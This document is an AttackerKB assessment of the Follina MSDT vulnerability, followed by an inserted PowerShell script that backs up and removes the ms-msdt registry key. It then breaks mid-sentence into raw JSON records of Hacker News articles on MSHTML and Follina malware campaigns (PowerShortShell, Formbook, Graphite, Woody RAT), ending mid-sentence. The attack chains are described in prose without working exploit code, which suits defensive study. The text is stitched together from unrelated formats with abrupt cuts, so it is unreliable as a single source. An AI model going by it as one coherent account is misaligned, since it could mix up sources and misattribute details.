Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.
**Recent assessments:**
**bwatters-r7** at May 31, 2022 12:56pm UTC reported:
EDIT: This was a quick description, and while it is still accurate as far as I know, a Rapid7 evaluation with greater analysis has been published here: <https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>
This is a relatively new vulnerability in the Microsoft Support Diagnostic Tool, so it is likely more information will come out in the coming days.
Currently, as seen in the wild, this vulnerability is embedded in a Word document and likely distributed with a `*.rar` file. When the Word document is opened, it reaches out and downloads an HTML file which has a JS section to implement the ms-msdt (Microsoft Support Diagnostic Tool) protocol, which is then coerced into launching a command.
As reported by Jake Williams in a thread here: <https://twitter.com/MalwareJake/status/1531019243411623939>, the command opens the accompanying `*.rar` file and pulls a base64-encoded `*.cab` file from it, then expands the `*.cab` file and runs a file contained in the cab file called `rgb.exe`. THIS FILENAME IS LIKELY MUTABLE, SO I DO NOT RECOMMEND POLICING FOR IT WITHOUT OTHER RULES.
Microsoft has already published mitigation techniques for this exploit: <https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>
Users are required to delete a single registry key called `HKEY_CLASSES_ROOT\ms-msdt`, though there is little discussion about the side effects of this operation. In his thread, Jake Williams has verified that the removal of this key prevents execution of the embedded payload.
Further reading:
<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>
Untested and unverified PoC: <https://github.com/chvancooten/follina.py/blob/main/follina.py>
<https://www.scythe.io/library/breaking-follina-msdt-vulnerability>
UPDATE: I adjusted the attacker value up in light of reports by Kevin Beaumont that if the attacker uses an RTF file as the host, then the exploit code will run just by viewing the file in the preview pane with explorer.exe. (Details here: <https://github.com/JMousqueton/PoC-CVE-2022-30190> and the above doublepulsar blog post.)
Assessed Attacker Value: 4
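The MSRC workaround the assessment points at, as an added PowerShell example that is not part of the original post or of Microsoft's guidance: it backs up the `HKEY_CLASSES_ROOT\ms-msdt` key before removing it, verifies the removal, and can restore the key once the patch is in place. The backup file location and the `shell\open\command` layout used to report the current handler command are assumptions.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the AttackerKB assessment): back up, remove, verify and
# restore the ms-msdt URL protocol handler key named in the assessment.
$KeyName    = 'HKEY_CLASSES_ROOT\ms-msdt'
$KeyPath    = "Registry::$KeyName"
$BackupFile = Join-Path $env:ProgramData 'ms-msdt-backup.reg'   # assumed location

function Test-MsdtHandlerRegistered {
    # True while the protocol handler key exists, i.e. the workaround is not applied.
    return (Test-Path -LiteralPath $KeyPath)
}

function Get-MsdtHandlerCommand {
    # Reports which command the ms-msdt: scheme currently maps to. A URL protocol
    # handler keeps its launch command under shell\open\command (assumed layout).
    $cmdKey = "$KeyPath\shell\open\command"
    if (-not (Test-Path -LiteralPath $cmdKey)) { return $null }
    return (Get-ItemProperty -LiteralPath $cmdKey).'(default)'
}

function Disable-MsdtHandler {
    if (-not (Test-MsdtHandlerRegistered)) {
        Write-Host "$KeyName is already absent; nothing to do."
        return
    }
    # 1. Export first so the change can be reversed after the patch is installed.
    reg.exe export $KeyName $BackupFile /y | Out-Null
    if ($LASTEXITCODE -ne 0 -or -not (Test-Path -LiteralPath $BackupFile)) {
        throw "Backup of $KeyName failed; refusing to delete without a backup."
    }
    # 2. Remove the handler so ms-msdt: URLs no longer resolve to a command.
    reg.exe delete $KeyName /f | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg delete returned exit code $LASTEXITCODE" }
    # 3. Verify the key is really gone before reporting success.
    if (Test-MsdtHandlerRegistered) { throw "$KeyName still present after delete." }
    Write-Host "Removed $KeyName (backup: $BackupFile)."
}

function Restore-MsdtHandler {
    # Re-import the exported key, e.g. once the vendor patch is deployed.
    if (-not (Test-Path -LiteralPath $BackupFile)) { throw "No backup at $BackupFile" }
    reg.exe import $BackupFile | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg import returned exit code $LASTEXITCODE" }
    Write-Host "Restored $KeyName from $BackupFile."
}

# Status report only; run Disable-MsdtHandler or Restore-MsdtHandler explicitly.
if (Test-MsdtHandlerRegistered) {
    Write-Host "ms-msdt handler present -> $(Get-MsdtHandlerCommand)"
} else {
    Write-Host "ms-msdt handler absent (workaround applied or key never existed)."
}
```

Run it from an elevated PowerShell session; the script only reports status until one of the two functions is called.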
platform to target Farsi-speaking victims with a previously undocumented PowerShell-based information stealer designed to harvest extensive details from infected machines.\n\n\"[T]he stealer is a PowerShell script, short with powerful collection capabilities \u2014 in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment,\" SafeBreach Labs researcher Tomer Bar [said](<https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/>) in a report published Wednesday.\n\nNearly half of the targets are from the U.S., with the cybersecurity firm noting that the attacks are likely aimed at \"Iranians who live abroad and might be seen as a threat to Iran's Islamic regime.\"\n\nThe phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be exploited using specially crafted Microsoft Office documents. The vulnerability was [patched](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) by Microsoft in September 2021, weeks after [reports](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) of active exploitation emerged in the wild.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgHnByMecpjc8CwGXlYLKRdnKgH6K5l2WpL2UN8Tsn4OgwoQxswAm4WoSD9d7rUtLNPFN59Z11rRxwTC3ZRa4tu-3rpZvcB0cO59nDNhYGmpe6L38Tx8Y-merXNp54673AbqS20eHA5cJ4CBUQ0KjBxCH5it3HfxkZ0_bBtO1JWp3_1j6rxKqM_SMJv>)\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" the Windows maker had noted.\n\nThe attack sequence described by SafeBreach begins with the targets receiving a spear-phishing email that comes with a Word document as an attachment. Opening the file triggers the exploit for CVE-2021-40444, resulting in the execution of a PowerShell script dubbed \"PowerShortShell\" that's capable of hoovering up sensitive information and transmitting it to a command-and-control (C2) server.\n\nWhile infections involving the deployment of the info-stealer were observed on September 15, a day after Microsoft issued patches for the flaw, the aforementioned C2 server was also employed to harvest victims' Gmail and Instagram credentials as part of two phishing campaigns staged by the same adversary in July 2021. \n\nThe development is the latest in a string of attacks that have capitalized on the MSHTML rendering engine flaw, with Microsoft previously [disclosing](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that abused the vulnerability as part of an initial access campaign to distribute custom Cobalt Strike Beacon loaders.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T11:33:00", "type": "thn", "title": "Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-22T07:07:24", "id": "THN:C4188C7A44467E425407D33067C14094", "href": "https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:47", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8>)\n\nA short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in 
place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker,\" SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) in a new report published Tuesday.\n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>), it has been put to use in [multiple attacks](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) ever since details pertaining to the flaw became public.\n\nThat same month, the technology giant [uncovered](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. 
Then in November, SafeBreach Labs [reported](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available [proof-of-concept Office exploit](<https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf>) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \"too-narrowly focused patch.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB>)\n\n\"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\" the researchers explained. \"When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\"\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. 
The RAR file, in turn, included a script written in Windows Script Host ([WSH](<https://en.wikipedia.org/wiki/Windows_Script_Host>)) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nConsequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>) malware payload from an attacker-controlled website.\n\nAs for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. \"So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\" the researchers said.\n\n\"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\" SophosLabs Principal Researcher Andrew Brandt said. \"Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button.\"\n\n\"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know,\" Brandt added. When reached for a response, a Microsoft spokesperson said \"we are investigating these reports and will take appropriate action as needed to help keep customers protected.\"\n\n**_Update:_** Microsoft told The Hacker News that the aforementioned exploit was indeed addressed with security updates that were released in September 2021. 
Sophos now notes that the CAB-less 40444 exploit \"may have evaded mitigations of CVE-2021-40444 without the September patch focused on the CAB-style attack\" and that the patch blocks the malicious behavior.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-22T07:45:00", "type": "thn", "title": "New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-29T03:33:40", "id": "THN:8A60310AB796B7372A105B7C8811306B", "href": "https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-02T06:04:33", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgRdLCnYaPXc_hVvRWhZ1nKYDtBRo6rwk1xGSO3wDrqcJ04igkpjKQyuyHKgmgeHL6GS7XLJjB6WCffBWb-ntXiCGFrcggxS3t1sQxo2LiuX7WI9F-gwW3tPRARSzEWceyzsLgu1VSyZndaF36ZhDlzpBRvkHLp7Ao_zaUYJmthkY4IZN4znwcyRdpY/s728-e100/hacking.jpg>)\n\nThe Russian state-sponsored threat actor known as [APT28](<https://thehackernews.com/2022/09/researchers-identify-3-hacktivist.html>) has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.\n\nThe technique \"is designed to be triggered when the user starts the presentation mode and moves the mouse,\" cybersecurity firm Cluster25 [said](<https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/>) in a technical report. \"The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive.\"\n\nThe dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads.\n\nThe attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development ([OECD](<https://en.wikipedia.org/wiki/OECD>)), a Paris-based intergovernmental entity.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjM4urmpBb2OaNLBBurEzXMWD5Gc0bF0d-1A8k55IscX0Hlkq-v1VQ39Xj9y7iwnPFlRBxvY1w6ZlUWb5dYTHpIwA3gVd7mcXXY64dImoNQO7bXe84Wez6JCWTlrdS77BnSIF6DllbmNoGykj67hPrGivBZDqdvzOgXckRo6adoi5bgIMpmnmWEI4_Y/s728-e100/ppt.jpg>)\n\nCluster25 noted the attacks may be ongoing, considering that the URLs used in the attacks appeared active in August and September, although the hackers had previously laid the groundwork for the campaign between January and February.\n\nPotential targets of the operation likely include 
entities and individuals operating in the defense and government sectors of Europe and Eastern Europe, the company added, citing an analysis of geopolitical objectives and the gathered artifacts.\n\nThis is not the first time the adversarial collective has deployed Graphite. In January 2022, Trellix [disclosed](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>) a similar attack chain that exploited the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) to drop the backdoor.\n\nThe development is a sign that APT28 (aka Fancy Bear) continues to hone its technical tradecraft and evolve its methods for maximum impact as exploitation routes once deemed viable (e.g., macros) cease to be profitable.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-28T10:09:00", "type": "thn", "title": "Hackers Using PowerPoint Mouseover Trick to Infect Systems with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, 
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-02T05:18:39", "id": "THN:B399D1943153CEEF405B85D4310C2142", "href": "https://thehackernews.com/2022/09/hackers-using-powerpoint-mouseover.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:39", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjqkUGrj098m-d_WWiB3rvM91Eu1x3fZweKFwfNSYwVrZToTWUlCh3s3UvHQIXtbPP4vPubJ_dEdC7jSX7gGkeScLCqYsa37Zuw_hFBK6g9FbzvO5nMZPrRUk6fjS1F01cduuDD_mnZ-OKnauen-xJmprSHgWH_jmx8MYUffZvp4uojtUBzm6BbCwIZ>)\n\nCybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking government officials overseeing national security policy and individuals in the defense industry in Western Asia.\n\nThe attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix \u2014 a new company created following the merger of security firms McAfee Enterprise and FireEye \u2014 said in a [report](<https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html>) shared with The Hacker News.\n\n\"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic,\" Trellix explained.\n\nFirst signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.\n\n\"The attack is particularly unique due to the prominence of its victims, the use of a recent [security flaw], and the use 
of an attack technique that the team had not seen before,\" Christiaan Beek, lead scientist at Trellix, said. \"The objective was clearly espionage.\"\n\nTrellix attributed the sophisticated attacks with moderate confidence to the Russia-based [APT28](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiHATh-_6CXq1DE4gF63tRFptoK4b3k33uBkDfc-JwaJRbLhn0cxU2JHUh5A-0U_AsQ3XgqvcFjPKtR6AVo-_daYwK8-jLWPGzamt2d7MjD1zstHO8IFPqdv3NTZU3GvsI_Wdk9Q7rG6zd84PEcawqbp7bJMrog9xoaUDkiJadygQnO1Wh-qdlH79xN>)\n\n\"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up,\" Trellix security researcher Marc Elias said.\n\nThe infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.\n\nThe DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes [Empire](<https://attack.mitre.org/software/S0363/>), an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.\n\n\"Using the Microsoft OneDrive as a command-and-control Server mechanism was a surprise, a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders,\" Beek explained. 
\"Next OneDrive would sync with the victim\u2019s machines and encrypted commands being executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker.\"\n\nIf anything, the development marks the continued exploitation of the MSHTML rendering engine flaw, with [Microsoft](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) and [SafeBreach Labs](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.\n\n\"The main takeaway is to highlight the level of access threat campaigns, and in particular how capable threat actors are able to permeate the most senior levels of government,\" Raj Samani, chief scientist and fellow at Trellix told The Hacker News. \"It is of paramount importance that security practitioners tasked with protecting such high value systems consider additional security measures to prevent, detect and remediate against such hostile actions.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-25T14:04:00", "type": "thn", "title": "Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-29T08:06:51", "id": "THN:BD014635C5F702379060A20290985162", "href": "https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T05:59:49", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEijZhKuLa-lQHOTya-LumppJRRe0-K5ZkrokQP6YCJulItM735L7x2VxidGSY3UAUweDYOrlUCjOSZOqKHcBnPJbUkrWJp74sfTiaR4x0D78nMuUhWticD0LtHFKvf1LGsYs6Cb9YnIJTJZwZygzO7MpLe49vP_YZwGnsgl_Jl9cnJRwT5-2Ahq8hf0/s728-e100/rat.jpg>)\n\nAn unknown threat actor has been targeting Russian entities with a newly discovered remote 
access trojan called **Woody RAT** for at least a year as part of a spear-phishing campaign.\n\nThe advanced custom backdoor is said to be delivered via either of two methods: archive files or Microsoft Office documents leveraging the now-patched \"Follina\" support diagnostic tool vulnerability ([CVE-2022-30190](<https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html>)) in Windows.\n\nLike other implants engineered for espionage-oriented operations, Woody RAT sports a wide range of features that enables the threat actor to remotely commandeer and steal sensitive information from the infected systems.\n\n\"The earliest versions of this RAT were typically archived into a ZIP file pretending to be a document specific to a Russian group,\" Malwarebytes researchers Ankur Saini and Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/>) in a Wednesday report.\n\n\"When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload.\"\n\nIn one instance, the hacking group attempted to strike a Russian aerospace and defense entity known as [OAK](<https://www.uacrussia.ru/en/>) based on evidence gleaned from a fake domain registered for this purpose.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg35LRJ0ayqjEMKo3ADOi7mLoAyI4moDW82GmOQ2AlRyBAr__ZIQMM7vFfzy16TW4_PJDRxTM3MyD7ds52s6eT0XLADE2Hz4UwUUa1dTPqwH82imY_KTeVPstKV8SaH6cUZFOFhzy9sDGaIgyuV67nCpgMjWxG3zJtHwhSLCWzu8TEc3yxib37k2VDO/s728-e100/malware.jpg>)\n\nAttacks leveraging the Windows flaw as part of this campaign first came to light on June 7, 2022, when researchers from the MalwareHunterTeam [disclosed](<https://twitter.com/malwrhunterteam/status/1534184385313923072>) the use of a document named \"\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx\" (which translates to \"Memo.docx\") to deliver a CSS payload containing the trojan.\n\nThe document 
purportedly offers best security practices for passwords and confidential information, among others, while acting as a decoy for dropping the backdoor.\n\nBesides encrypting its communications with a remote server, Woody RAT is equipped with capabilities to write arbitrary files to the machine, execute additional malware, delete files, enumerate directories, capture screenshots, and gather a list of running processes.\n\nAlso embedded within the malware are two .NET-based libraries named WoodySharpExecutor and WoodyPowerSession that can be used to run .NET code and PowerShell commands received from the server, respectively.\n\nFurthermore, the malware makes use of the [process hollowing technique](<https://attack.mitre.org/techniques/T1055/012/>) to inject itself into a suspended Notepad process and deletes itself from the disk to evade detection from security software installed on the compromised host.\n\nMalwarebytes has yet to attribute the attacks to a specific threat actor, citing lack of solid indicators linking the campaign to a previously known group, although Chinese and North Korean nation-state collectives have targeted Russia in the past.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-04T12:55:00", "type": "thn", "title": "New Woody RAT Malware Being Used to Target Russian Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T05:42:05", "id": "THN:DFB68B1B6C2EFBB410EB54D83320B71C", "href": "https://thehackernews.com/2022/08/new-woody-rat-malware-being-used-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-01T11:56:12", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiUNLbMQKFGJkk_0MuvTZUsbdZk7Mwzi1ubRnWBoCLxeBkICJ8W6xX9SHPsYas7bLDtqj4wO1lZsmsxuPuAxkocOzNUvBMbOmM2yJIGg2t7CnMv5yAaUiSHpTbdt9nsHappGPYR_oG1nild6RLvcMvaILplweROkw7HFZp7QvCAE_V31Ku-G5wnnnZq/s728-e100/office.jpg>)\n\nAn advanced persistent threat (APT) actor aligned with Chinese state interests has been observed 
